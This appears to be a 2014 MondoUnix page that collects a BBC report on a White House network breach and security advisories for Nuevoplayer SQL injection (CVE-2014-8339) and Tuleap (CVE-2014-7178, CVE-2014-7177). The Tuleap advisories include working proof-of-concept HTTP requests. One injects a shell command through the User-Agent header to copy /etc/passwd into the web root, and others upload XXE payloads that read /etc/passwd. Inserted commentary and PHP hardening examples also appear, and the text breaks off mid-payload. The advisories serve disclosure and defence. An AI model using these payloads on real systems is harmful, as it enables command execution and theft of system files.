MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29 Oct 2014

White House computer network ‘hacked’


A White House computer network has been breached by hackers, it has been reported.

The unclassified Executive Office of the President network was attacked, according to the Washington Post.

US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said.

White House officials believe the attack was state-sponsored but are not saying what - if any - data was taken.

In a statement to the AFP news agency, the White House said "some elements of the unclassified network" had been affected.

A White House official, speaking on condition of anonymity, told the Washington Post: "In the course of assessing recent threats, we identified activity of concern on the unclassified EOP network.

"Any such activity is something we take very seriously. In this case, we took immediate measures to evaluate and mitigate the activity.

'State-sponsored'

"Certainly, a variety of actors find our networks to be attractive targets and seek access to sensitive information. We are still assessing the activity of concern."

The source said the attack was consistent with a state-sponsored effort and Russia is thought by the US government to be one of the most likely threats.

"On a regular basis, there are bad actors out there who are attempting to achieve intrusions into our system," a second White House official told the Washington Post.

"This is a constant battle for the government and our sensitive government computer systems, so it's always a concern for us that individuals are trying to compromise systems and get access to our networks."

The Post quoted its sources as saying that the attack was discovered two-to-three weeks ago. Some White House staff were reportedly told to change their passwords and there was some disruption to network services.

In a statement given to Agence France-Presse, a White House official said the Executive Office of the President received daily alerts concerning numerous possible cyber threats.

In the course of addressing the breach, some White House users were temporarily disconnected from the network.

"Our computers and systems have not been damaged, though some elements of the unclassified network have been affected. The temporary outages and loss of connectivity for our users is solely the result of measures we have taken to defend our networks," the official said.

The US's National Security Agency, Federal Bureau of Investigation and Security Service were reportedly investigating.

Requests for comment were referred to the Department for Homeland Security, a spokesman for which was not immediately available. A White House spokesman has not responded to the BBC's request for comment.

Source: http://www.bbc.com/news/technology-29817644

29 Oct 2014

NuevoLabs flash player for clipshare SQL Injection

Nuevolabs Nuevoplayer for clipshare SQL Injection
=======================================================================
 
:: ADVISORY SUMMARY ::
Title:     Nuevolabs Nuevoplayer for clipshare SQL Injection
Vendor:    NUEVOLABS (www.nuevolabs.com)
Product:   NUEVOPLAYER for clipshare
Credits:   Cory Marsh - protectlogic.com
Discovery: 2014-10-10
Release:   2014-10-28
 
Nuevoplayer is a popular flash video player with integration into multiple popular video sharing suites.  The most 
notable is Clipshare (clip-share.com).  Nuevoplayer provides flash video playing capabilities to third party video 
sharing suites.
 
 
:: VULNERABILITY ::
Type:     SQL Injection and Privilege Escalation
Category: Remote
Severity: High
CVSS2:    7.7
CVSS2:    (AV:N/AC:L/Au:N/C:P/I:P/A:C/E:F/RL:TF/RC:C)
CVE-ID:   CVE-2014-8339
 
 
:: AFFECTED PRODUCT VERSIONS ::
NUEVOLABS NUEVOPLAYER for clipshare version 8.0 and possibly earlier.
 
nuevolabs.com
clip-share.com
 
 
:: VULNERABILITY DETAILS ::
An SQL injection vulnerability in the Nuevoplayer midroll feature, as integrated with Clipshare, allows remote 
attackers to read any information in the affected MySQL database.  Midrolls allow sites to insert ads ("midrolls") 
into videos during playback.
 
Because Clipshare stores the administrator password in the database, this leads to full compromise of the affected 
Clipshare system.
 
 
:: SOLUTION ::
The vendor is not providing patches for affected customers.
 
If the site does NOT use midrolls, you can simply delete midroll.php to protect yourself.  If you wish to patch the 
issue, you can apply the patch below to midroll.php, which wraps the $ch variable in an intval() call on line 29 of 
midroll.php:
line 29: 'channel = '.$ch.
becomes: 'channel = '.intval($ch).
 
------------------- CUT HERE -------------------
--- midroll.php 2014-10-16 21:02:36.077663202 -0600
+++ midroll-patched.php 2014-10-16 21:02:02.197662566 -0600
@@ -26,7 +26,7 @@
 
    $chans = explode("|",$channel);
    foreach($chans as $ch) {
-       if(!$ch=='0') { $add.='channel = '.$ch.' OR '; }
+       if(!$ch=='0') { $add.='channel = '.intval($ch).' OR '; }
    }
    $add =trim($add); $add=trim($add,'OR');$add=trim($add);
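Review bot: on the changed line the guard still tests the raw $ch (`!$ch=='0'`) while the query receives intval($ch), so a non-numeric segment such as "abc" passes the guard and is emitted as `channel = 0`, silently changing the filter instead of being rejected. Cast once and test the cast value, e.g. `$id = intval($ch); if ($id > 0) { $add.='channel = '.$id.' OR '; }`. Because `!` binds tighter than `==`, the guard is also worth rewriting as an explicit comparison, and the trim($add,'OR') on the next line strips a set of characters rather than the literal suffix, so collecting the clauses in an array and joining them with implode(' OR ', ...) would be clearer.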
------------------- CUT HERE -------------------
 
To apply the patch, copy and paste it into a new file (midroll.patch, for example), upload this file to your server and 
apply the patch with the command: patch /path/to/midroll.php < /path/to/midroll.patch
e.g.:
$ cp midroll.patch /var/www/site/nuevo/midroll.patch
$ cd /var/www/site/nuevo
$ patch midroll.php < midroll.patch
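 
The same pipe-separated channel filter, as an added example that is not Nuevoplayer's code: the concatenating shape the advisory describes next to a builder that rejects non-numeric segments and binds the ids as integers. The function names, the `video` table, the empty-list policy and the sample inputs are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added illustration; function names, the `video` table and all inputs are assumptions.

/** Concatenating builder: the shape the advisory describes (kept vulnerable on purpose). */
function build_filter_concat(string $channel): string
{
    $clauses = [];
    foreach (explode('|', $channel) as $ch) {
        if ($ch !== '0' && $ch !== '') {
            $clauses[] = 'channel = ' . $ch;   // request data becomes SQL text
        }
    }
    return implode(' OR ', $clauses);
}

/**
 * Hardened builder: every segment must be a short run of digits, and the ids
 * are handed to the driver as bound integers, never as SQL text.
 * Returns [SQL fragment, list of int ids].
 */
function build_filter_bound(string $channel): array
{
    $ids = [];
    foreach (explode('|', $channel) as $ch) {
        // Reject instead of coercing: intval('1 OR 1=1') quietly yields 1, which
        // hides tampering. The D modifier stops "$" matching before a trailing newline.
        if (preg_match('/^[0-9]{1,9}$/D', $ch) !== 1) {
            throw new InvalidArgumentException('channel must be a |-separated list of numeric ids');
        }
        if ((int) $ch !== 0) {
            $ids[] = (int) $ch;
        }
    }
    if ($ids === []) {
        // Assumed policy: no usable id matches nothing. Adjust to what an
        // empty channel list means in the application.
        return ['1 = 0', []];
    }
    $marks = implode(', ', array_fill(0, count($ids), '?'));
    return ["channel IN ($marks)", $ids];
}

/** Runs the filter against the sample table and returns the number of matching rows. */
function count_matches(PDO $pdo, string $where, array $ids = []): int
{
    $stmt = $pdo->prepare('SELECT COUNT(*) FROM video WHERE ' . $where);
    foreach (array_values($ids) as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);
    }
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed data set: three videos in channels 1, 2 and 3 (in-memory SQLite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE video (id INTEGER PRIMARY KEY, channel INTEGER)');
$pdo->exec('INSERT INTO video (channel) VALUES (1), (2), (3)');

$benign   = '1|2';
$tampered = '1 OR 1=1';   // constructed non-numeric segment

printf("concat, benign:   %d rows\n", count_matches($pdo, build_filter_concat($benign)));
printf("concat, tampered: %d rows\n", count_matches($pdo, build_filter_concat($tampered)));

[$where, $ids] = build_filter_bound($benign);
printf("bound,  benign:   %d rows\n", count_matches($pdo, $where, $ids));

try {
    build_filter_bound($tampered);
} catch (InvalidArgumentException $e) {
    printf("bound,  tampered: rejected (%s)\n", $e->getMessage());
}
```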
 
 
:: DISCLOSURE ::
 
2014-10-15 initial vendor contact        - no response
2014-10-21 CVE requested
2014-10-23 CVE assigned, vendor contact  - no response
2014-10-24 posted to vendor forum        - no response
2014-10-25 fourth vendor contact         - no response
2014-10-26 vendor deletes post and suspends account
2014-10-29 public disclosure
 
 
:: DISCLAIMER ::
 
THE INFORMATION PRESENTED HEREIN ARE PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, 
INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR 
WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE 
PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT 
THE USER'S OWN RISK.


29 Oct 2014

Tuleap 7.4.99.5 Remote Command Execution

Vulnerability title: Tuleap <= 7.4.99.5 Remote Command Execution in Enalean Tuleap
CVE: CVE-2014-7178
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
Tuleap does not validate the syntax of requests submitted to the SVN handler pages, so it does not detect whether a request passed to the passthru() function introduces extra parameters that would be executed in the context of the application.
 
This vulnerability can be exploited by external attackers to introduce external commands into the workflow of the application, which then executes them, as shown in the proof-of-concept request below.
 
After registering with the application, the vulnerability can be triggered by sending a request similar to the one below:
 
 
GET /svn/viewvc.php/?roottype=svn&root=t11 HTTP/1.1
Host: [IP]
User-Agent: M" && cat /etc/passwd > /usr/share/codendi/src/www/passwd.txt && "ozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[IP]/svn/?group_id=102
Cookie: PHPSESSID=2uqjkd0iupn84gigi4e1tekg95; TULEAP_session_hash=362a9e41d1a93c8f195db4ccc6698ef5
Connection: keep-alive
Cache-Control: max-age=0
 
 
Note: In order to exploit this vulnerability a user needs to be in position to see SVN repository.
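 
How a request header can reach a child process without being parsed by a shell, as an added example that is not Tuleap's code: an unsafe command string, the same string with escapeshellarg(), and a shell-free launch that passes the value through the environment. All helper names, the script path placeholder and the sample User-Agent are assumptions.

```php
<?php
declare(strict_types=1);

// Added illustration with hypothetical helpers; this is not Tuleap's code.

/** Unsafe shape: a header value is pasted between double quotes in a shell command line. */
function viewvc_command_unsafe(string $script, string $userAgent): string
{
    return 'HTTP_USER_AGENT="' . $userAgent . '" ' . $script;
}

/** When a shell string is unavoidable: escapeshellarg() single-quotes each value. */
function viewvc_command_quoted(string $script, string $userAgent): string
{
    return 'HTTP_USER_AGENT=' . escapeshellarg($userAgent) . ' ' . escapeshellarg($script);
}

/**
 * Preferred: no shell at all. With an argv array (PHP 7.4+) proc_open() executes
 * the program directly, and request data travels in the environment array, so
 * quotes, "&&" and ";" in it are never interpreted as syntax.
 */
function run_without_shell(array $argv, array $env): string
{
    $proc = proc_open($argv, [1 => ['pipe', 'w']], $pipes, null, $env);
    if (!is_resource($proc)) {
        throw new RuntimeException('could not start child process');
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? '' : $out;
}

// Constructed header value containing shell metacharacters and a harmless command.
$userAgent = 'M" && echo INJECTED && "ozilla/5.0';
$script    = '/path/to/viewvc.cgi';   // placeholder path

// The unsafe string now contains three commands; the quoted one is a single assignment.
echo viewvc_command_unsafe($script, $userAgent), "\n";
echo viewvc_command_quoted($script, $userAgent), "\n";

// The child (the PHP CLI itself, used as a stand-in program) sees the header as plain data.
$seen = run_without_shell(
    [PHP_BINARY, '-r', 'echo getenv("HTTP_USER_AGENT");'],
    ['HTTP_USER_AGENT' => $userAgent]
);
echo $seen === $userAgent ? "child received the value unchanged\n" : "value was altered\n";
```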
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7178/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 


29 Oct 2014

Tuleap 7.2 XXE Injection

Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
CVE: CVE-2014-7177
Vendor: Enalean
Product: Tuleap
Affected version: 7.2 and earlier
Fixed version: 7.4.99.5
Reported by: Jerzy Kramarz
 
Details:
 
Multiple XML External Entity (XXE) injection issues have been found and confirmed in the software when acting as an authenticated user. A successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as a PoC to confirm the vulnerability.
 
Vulnerability 1:
 
1) Upload an XXE payload using the following request:
 
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
Content-Length: 10561
 
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id"
 
102
-----------------------------25777276834778
Content-Disposition: form-data; name="func"
 
docreate
-----------------------------25777276834778
Content-Disposition: form-data; name="group_id_template"
 
100
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_prjname"
 
Commencez à taper
-----------------------------25777276834778
Content-Disposition: form-data; name="create_mode"
 
xml
-----------------------------25777276834778
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
Content-Type: text/xml
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>123&xxe;</name>
  <item_name>e123&xxe;</item_name>
  <description>123&xxe;</description>
  <cannedResponses/>
  <formElements>
    <formElement type="file" ID="F1" rank="0" use_it="0">
      <name>attachment</name>
      <label>Attachments</label>
    </formElement>
    <formElement type="text" ID="F2" rank="2" use_it="0">
      <name>details</name>
      <label>Original Submission</label>
      <description>A full description of the artifact&xxe;</description>
      <properties rows="7" cols="60"/>
    </formElement>
    <formElement type="string" ID="F3" rank="4" use_it="0" required="1">
      <name>summary</name>
      <label>Summary</label>
      <description>One line description of the artifact&xxe;</description>
      <properties maxchars="150" size="60"/>
    </formElement>
    <formElement type="tbl" ID="F4" rank="6" use_it="0">
      <name>cc</name>
      <label>CC</label>
      <properties hint="Type in a search term"/>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F7" rank="12" use_it="0">
      <name>status_id</name>
      <label>Status</label>
      <description>Artifact Status</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F7-V0" label="Open">
            <description>The artifact has been submitted&xxe;</description>
          </item>
          <item ID="F7-V1" label="Closed">
            <description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
          </item>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F8" rank="14" use_it="0">
      <name>assigned_to</name>
      <label>Assigned to</label>
      <description>Who is in charge of solving the artifact&xxe;</description>
      <bind type="users">
        <items>
          <item label="group_members"/>
        </items>
      </bind>
    </formElement>
    <formElement type="sb" ID="F11" rank="20" use_it="0">
      <name>category_id</name>
      <label>Category</label>
      <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
      <bind type="static" is_rank_alpha="0"/>
    </formElement>
    <formElement type="sb" ID="F12" rank="22" use_it="0">
      <name>severity</name>
      <label>Priority</label>
      <description>How quickly the artifact must be completed</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F12-V0" label="1 - Lowest"/>
          <item ID="F12-V1" label="2"/>
          <item ID="F12-V2" label="3"/>
          <item ID="F12-V3" label="4"/>
          <item ID="F12-V4" label="5 - Medium"/>
          <item ID="F12-V5" label="6"/>
          <item ID="F12-V6" label="7"/>
          <item ID="F12-V7" label="8"/>
          <item ID="F12-V8" label="9 - Highest"/>
        </items>
        <decorators>
          <decorator REF="F12-V0" r="255" g="255" b="204"/>
          <decorator REF="F12-V1" r="255" g="255" b="102"/>
          <decorator REF="F12-V2" r="255" g="204" b="0"/>
          <decorator REF="F12-V3" r="255" g="153" b="0"/>
          <decorator REF="F12-V4" r="255" g="102" b="0"/>
          <decorator REF="F12-V5" r="255" g="51" b="0"/>
          <decorator REF="F12-V6" r="204" g="51" b="0"/>
          <decorator REF="F12-V7" r="153" g="0" b="0"/>
          <decorator REF="F12-V8" r="51" g="0" b="0"/>
        </decorators>
      </bind>
    </formElement>
    <formElement type="sb" ID="F13" rank="24" use_it="0">
      <name>stage&xxe;</name>
      <label>Stage&xxe;</label>
      <description>Stage in the life cycle of the artifact&xxe;</description>
      <bind type="static" is_rank_alpha="0">
        <items>
          <item ID="F13-V0" label="New">
            <description>The artifact has just been submitted</description>
          </item>
          <item ID="F13-V1" label="Analyzed">
            <description>The cause of the artifact has been identified and documented</description>
          </item>
          <item ID="F13-V2" label="Accepted">
            <description>The artifact will be worked on.</description>
          </item>
          <item ID="F13-V3" label="Under Implementation">
            <description>The artifact is being worked on.</description>
          </item>
          <item ID="F13-V4" label="Ready for Review">
            <description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
          </item>
          <item ID="F13-V5" label="Ready for Test">
            <description>Updated/Created software is ready to be included in the next build</description>
          </item>
          <item ID="F13-V6" label="In Test">
            <description>Updated/Created software is in the build and is ready to enter the test phase</description>
          </item>
          <item ID="F13-V7" label="Approved">
            <description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
          </item>
          <item ID="F13-V8" label="Declined">
            <description>The artifact was not accepted.</description>
          </item>
          <item ID="F13-V9" label="Done">
            <description>The artifact is closed.</description>
          </item>
        </items>
      </bind>
    </formElement>
  </formElements>
  <semantics>
    <semantic type="tooltip"/>
  </semantics>
  <reports>
    <report is_default="0">
      <name>Default</name>
      <description>The system default artifact report</description>
      <criterias/>
      <renderers>
        <renderer type="table" rank="0" chunksz="15" multisort="15">
          <name>Results</name>
          <columns/>
        </renderer>
        <renderer type="plugin_graphontrackersv5" rank="1">
          <name>Default</name>
          <description>Graphic Report By Default For Support Requests</description>
          <charts/>
        </renderer>
      </renderers>
    </report>
  </reports>
  <workflow/>
  <permissions>
    <permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F11" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F12" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
    <permission scope="field" REF="F13" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
    <permission scope="tracker" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_ACCESS_FULL"/>
  </permissions>
</tracker>
 
-----------------------------25777276834778
Content-Disposition: form-data; name="name"
 
123
-----------------------------25777276834778
Content-Disposition: form-data; name="description"
 
123
-----------------------------25777276834778
Content-Disposition: form-data; name="itemname"
 
e123
-----------------------------25777276834778
Content-Disposition: form-data; name="Create"
 
Créer
-----------------------------25777276834778--
 
 
2) The server responds with a 'tracker number'. The response contains a link to the specific "tracker", which will be similar to the following:
 
 
https://[ip]/plugins/tracker/?group_id=102&tracker=11
 
 
3) Using the retrieved tracker number, the XXE can be triggered by visiting the following URL:
 
 
https://[ip]/plugins/tracker/?tracker=11&func=admin-formElements
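 
One way an uploaded tracker definition can be parsed so that a DOCTYPE with entity declarations is refused before any field is read, as an added example that is not Tuleap's code or its actual fix. The function name and both sample documents are assumptions; the samples are constructed and use a placeholder path.

```php
<?php
declare(strict_types=1);

// Added illustration; load_tracker_xml() is a hypothetical helper, not Tuleap's code.

/**
 * Parses an uploaded tracker definition and refuses any document that carries
 * a DOCTYPE, which is where internal and external entities are declared.
 */
function load_tracker_xml(string $xml): DOMDocument
{
    if ($xml === '') {
        throw new RuntimeException('empty upload');
    }
    $previous = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // LIBXML_NOENT and LIBXML_DTDLOAD are deliberately NOT set: entity references
    // are not substituted and no external subset is fetched. LIBXML_NONET also
    // forbids network access. On PHP < 8.0 with libxml2 < 2.9, additionally call
    // libxml_disable_entity_loader(true) (deprecated since PHP 8.0).
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$ok) {
        throw new RuntimeException('upload is not well-formed XML');
    }
    foreach ($dom->childNodes as $node) {
        if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new RuntimeException('DOCTYPE declarations are not accepted in tracker XML');
        }
    }
    return $dom;
}

/** Reads the tracker name from a document that passed load_tracker_xml(). */
function tracker_name(DOMDocument $dom): string
{
    $node = $dom->getElementsByTagName('name')->item(0);
    return $node === null ? '' : trim($node->textContent);
}

// Constructed samples: a plain definition, and one that declares an external
// entity pointing at a placeholder path and references it in <name>.
$clean = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<tracker instantiate_for_new_projects="0">
  <name>Bugs</name>
  <item_name>bug</item_name>
</tracker>
XML;

$withEntity = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "file:///placeholder/path">]>
<tracker instantiate_for_new_projects="0">
  <name>123&xxe;</name>
</tracker>
XML;

foreach (['clean' => $clean, 'with entity' => $withEntity] as $label => $xml) {
    try {
        printf("%s: accepted, name = %s\n", $label, tracker_name(load_tracker_xml($xml)));
    } catch (RuntimeException $e) {
        printf("%s: rejected (%s)\n", $label, $e->getMessage());
    }
}
```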
 
 
Vulnerability 2:
 
1) Upload an XXE payload using the following request:
 
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
Host: [ip]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=e619b58add92383b3647ee5ba68c4a79
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------12077103611061
Content-Length: 25588
 
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id"
 
102
-----------------------------12077103611061
Content-Disposition: form-data; name="func"
 
docreate
-----------------------------12077103611061
Content-Disposition: form-data; name="group_id_template"
 
100
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_prjname"
 
Commencez à taper
-----------------------------12077103611061
Content-Disposition: form-data; name="create_mode"
 
xml
-----------------------------12077103611061
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="tracker_bugs.xml"
Content-Type: text/xml
 
<?xml version="1.0"?>
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
<tracker instantiate_for_new_projects="0">
  <name>Bugs</name>
  <item_name>bug</item_name>
  <description>Bugs Tracker</description>
  <cannedResponses/>
  <formElements>
    <formElement type="column" ID="F1" rank="120">
      <name>column8</name>
      <label>Column Top 1</label>
      <formElements>
        <formElement type="aid" ID="F2" rank="0">
          <name>artifact_id</name>
          <label>Artifact ID</label>
          <description>Unique artifact identifier&xxe;</description>
        </formElement>
        <formElement type="subby" ID="F3" rank="1">
          <name>submitted_by</name>
          <label>Submitted by</label>
          <description>User who originally submitted the artifact&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="column" ID="F4" rank="121">
      <name>column10&xxe;</name>
      <label>Column Top 2&xxe;</label>
      <formElements>
        <formElement type="lud" ID="F5" rank="0">
          <name>last_update_date</name>
          <label>Last Modified On&xxe;</label>
          <description>Date and time of the latest modification in an artifact&xxe;</description>
        </formElement>
        <formElement type="subon" ID="F6" rank="2">
          <name>open_date&xxe;</name>
          <label>Submitted on&xxe;</label>
          <description>Date and time for the initial artifact submission&xxe;</description>
        </formElement>
      </formElements>
    </formElement>
    <formElement type="fieldset" ID="F7" rank="132" required="1">
      <name>fieldset_1</name>
      <label>Details</label>
      <description>fieldset_default_desc_key</description>
      <formElements>
        <formElement type="string" ID="F8" rank="0" required="1">
          <name>summary</name>
          <label>Summary</label>
          <description>One line description of the artifact</description>
          <properties maxchars="150" size="61"/>
        </formElement>
        <formElement type="text" ID="F9" rank="7">
          <name>details</name>
          <label>Original Submission</label>
          <description>A full description of the artifact</description>
          <properties rows="7" cols="80"/>
        </formElement>
        <formElement type="column" ID="F10" rank="8">
          <name>column10</name>
          <label>Column Details 1</label>
          <formElements>
            <formElement type="sb" ID="F11" rank="0">
              <name>severity</name>
              <label>Severity</label>
              <description>Impact of the artifact on the system (Critical, Major,...)</description>
              <bind type="static" is_rank_alpha="0">
                <items>
                  <item ID="F11-V0" label="1 - Ordinary"/>
                  <item ID="F11-V1" label="2"/>
                  <item ID="F11-V2" label="3"/>
                  <item ID="F11-V3" label="4"/>
                  <item ID="F11-V4" label="5 - Major"/>
                  <item ID="F11-V5" label="6"/>
                  <item ID="F11-V6" label="7"/>
                  <item ID="F11-V7" label="8"/>
                  <item ID="F11-V8" label="9 - Critical"/>
                </items>
                <decorators>
                  <decorator REF="F11-V0" r="255" g="255" b="102"/>
                  <decorator REF="F11-V1" r="255" g="204" b="51"/>
                  <decorator REF="F11-V2" r="255" g="153" b="0"/>
                  <decorator REF="F11-V3" r="255" g="102" b="0"/>
                  <decorator REF="F11-V4" r="255" g="51" b="0"/>
                  <decorator REF="F11-V5" r="204" g="0" b="0"/>
                  <decorator REF="F11-V6" r="153" g="0" b="0"/>
                  <decorator REF="F11-V7" r="102" g="0" b="0"/>
                  <decorator REF="F11-V8" r="51" g="0" b="0"/>
                </decorators>
              </bind>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="column" ID="F12" rank="12">
          <name>column10</name>
          <label>Column Details 2</label>
          <formElements>
            <formElement type="sb" ID="F13" rank="0">
              <name>category</name>
              <label>Category</label>
              <description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
              <bind type="static" is_rank_alpha="0"/>
            </formElement>
          </formElements>
        </formElement>
        <formElement type="date" ID="F14" rank="20" use_it="0">
          <name>close_date</name>
          <label>End Date</label>
          <description>End Date</description>
          <properties default_value="today"/>
        </formElement>
        <formElement type="msb" ID="F15" rank="31" use_it="0">
          <name>multi_assigned_to</name>
          <label>Assigned to (multiple)</label>
